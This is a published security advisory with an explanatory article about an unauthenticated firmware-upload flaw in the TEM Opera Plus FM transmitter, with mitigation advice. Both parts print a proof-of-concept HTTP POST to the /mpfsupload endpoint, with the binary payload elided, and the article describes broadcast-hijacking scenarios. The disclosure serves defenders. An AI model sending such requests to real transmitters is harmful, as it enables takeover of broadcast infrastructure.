TEM Opera Plus FM Family Transmitter 35.45 - Remote Code Execution
TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution
Vendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.
Product web page: https://www.tem-italy.it
Affected version: Software version: 35.45
Webserver version: 1.7
Summary: This new line of Opera plus FM Transmitters combines very
high efficiency, high reliability and low energy consumption in compact
solutions. They have innovative functions and features that can eliminate
the costs required by additional equipment: automatic exchange of audio
sources, built-in stereo encoder, integrated RDS encoder, parallel I/O
card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP
Webserver.
Desc: The device allows access to an unprotected endpoint that allows
MPFS File System binary image upload without authentication. The MPFS2
file system module provides a light-weight read-only file system that
can be stored in external EEPROM, external serial Flash, or internal
Flash program memory. This file system serves as the basis for the
HTTP2 web server module, but is also used by the SNMP module and is
available to other applications that require basic read-only storage
capabilities. This can be exploited to overwrite the flash program
memory that holds the web server's main interfaces and execute arbitrary
code.
Tested on: Webserver
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5799
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5799.php
18.08.2023
--
POST /mpfsupload HTTP/1.1
Host: 192.168.1.2:8000
Content-Length: 251
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----joxypoxy2
User-Agent: MPFS2_PoC/2.0c
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------joxypoxy2
Content-Disposition: form-data; name="i"; filename="MPFSimg2.bin"
Content-Type: application/octet-stream
MPFS...<CGI BINARY PHONE HOME>
-----joxypoxy2--
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html>Remote Code Execution Vulnerability in TEM Opera Plus FM Family Transmitter 35.45
The TEM Opera Plus FM Family Transmitter 35.45, a high-efficiency broadcast transmitter developed by Telecomunicazioni Elettro Milano (TEM) S.r.l., has recently been found to harbor a critical security flaw that enables remote code execution (RCE). This vulnerability arises from an unprotected endpoint allowing unauthorized binary file uploads to the device’s flash memory via the MPFS2 file system module, effectively compromising the core firmware and enabling attackers to execute arbitrary code.
Technical Overview: The MPFS2 File System and Its Role
The MPFS2 (Memory-Programmable File System 2) is a lightweight, read-only file system designed for embedded systems. It supports storage in external EEPROM, serial Flash, or internal Flash program memory. In the TEM Opera Plus FM Transmitter, MPFS2 serves as the foundation for the HTTP2 web server, SNMP module, and other firmware components requiring persistent, read-only data storage.
While intended for secure firmware management, the implementation in version 35.45 exposes a critical flaw: the /mpfsupload endpoint accepts file uploads without authentication. This allows an attacker to upload a specially crafted binary image, MPFSimg2.bin, which can overwrite the flash memory containing the web server’s main interfaces and core logic.
POST /mpfsupload HTTP/1.1
Host: 192.168.1.2:8000
Content-Length: 251
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----joxypoxy2
User-Agent: MPFS2_PoC/2.0c
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------joxypoxy2
Content-Disposition: form-data; name="i"; filename="MPFSimg2.bin"
Content-Type: application/octet-stream
MPFS...
-----joxypoxy2--
Explanation: This HTTP POST request sends a multipart form data payload to the /mpfsupload endpoint. The file named MPFSimg2.bin is uploaded with a Content-Type of application/octet-stream, indicating binary data. The response 200 OK with the message MPFS Update Successful confirms that the upload was accepted and processed.
Crucially, the binary payload is not validated or authenticated. The lack of access control means any attacker with network access to the device can upload malicious firmware, replacing the legitimate web server code with a backdoor or malicious executable.
Exploitation and Impact
Once the malicious binary is uploaded and flashed into the device’s program memory, the attacker gains full control over the device’s web interface, SNMP services, and potentially the broadcast signal itself. This can lead to:
- Unauthorized broadcast manipulation – altering audio content or RDS data.
- Remote shell access – execution of arbitrary commands via CGI scripts.
- Denial of service – corrupting firmware and rendering the transmitter inoperable.
- Privilege escalation – bypassing security controls and gaining administrative access.
Given that the transmitter is often deployed in public broadcasting infrastructure, such vulnerabilities pose a significant risk to media integrity, public safety, and regulatory compliance.
Vendor and Affected Versions
| Vendor | Telecomunicazioni Elettro Milano (TEM) S.r.l. |
|---|---|
| Product | Opera Plus FM Family Transmitter |
| Software Version | 35.45 |
| Webserver Version | 1.7 |
| Advisory ID | ZSL-2023-5799 |
| Discovery | Gjoko "LiquidWorm" Krstic @zeroscience |
| Publication Date | 18.08.2023 |
While the product is marketed as "high reliability" and "low energy consumption," the absence of authentication on the /mpfsupload endpoint undermines these claims in practice.
Real-World Use Case: Broadcast Hijacking
Imagine a scenario where an attacker uploads a malicious binary that includes a CGI script to redirect all incoming HTTP requests to a malicious server. The transmitter could then be used to broadcast misinformation, such as fake emergency alerts or unauthorized advertisements, without the operator’s knowledge.
Additionally, the transmitter’s built-in GSM telemetry and TCP/IP connectivity make it a prime target for remote exploitation. An attacker could exploit this vulnerability to gain persistent access to the device, even after rebooting, due to the persistent nature of flash memory.
Security Recommendations and Mitigations
For operators and administrators using TEM Opera Plus FM Transmitters, immediate action is required:
- Disable or restrict access to
/mpfsuploadendpoint – via firewall rules or access control lists. - Update firmware – if an official patch is released by TEM, apply it immediately.
- Implement network segmentation – isolate transmitters from public networks.
- Monitor for anomalous HTTP POST requests – use intrusion detection systems (IDS) to detect suspicious uploads.
- Use secure boot mechanisms – if available, ensure firmware integrity verification during boot.
For developers, this case highlights the importance of secure file system design: even read-only file systems must be protected against unauthorized write operations. The principle of least privilege should be applied rigorously, especially in devices with remote connectivity.
Conclusion: A Wake-Up Call for Embedded Security
The TEM Opera Plus FM Transmitter 35.45 vulnerability exemplifies a growing trend in embedded systems: security by obscurity fails. Devices that appear "secure" due to proprietary hardware or limited access often lack fundamental security controls like authentication and input validation.
As cyber threats increasingly target infrastructure, such as broadcast transmitters, the need for robust, auditable security practices in embedded firmware cannot be overstated. This vulnerability serves as a stark reminder: no device is secure if it allows unauthenticated binary uploads to its core memory.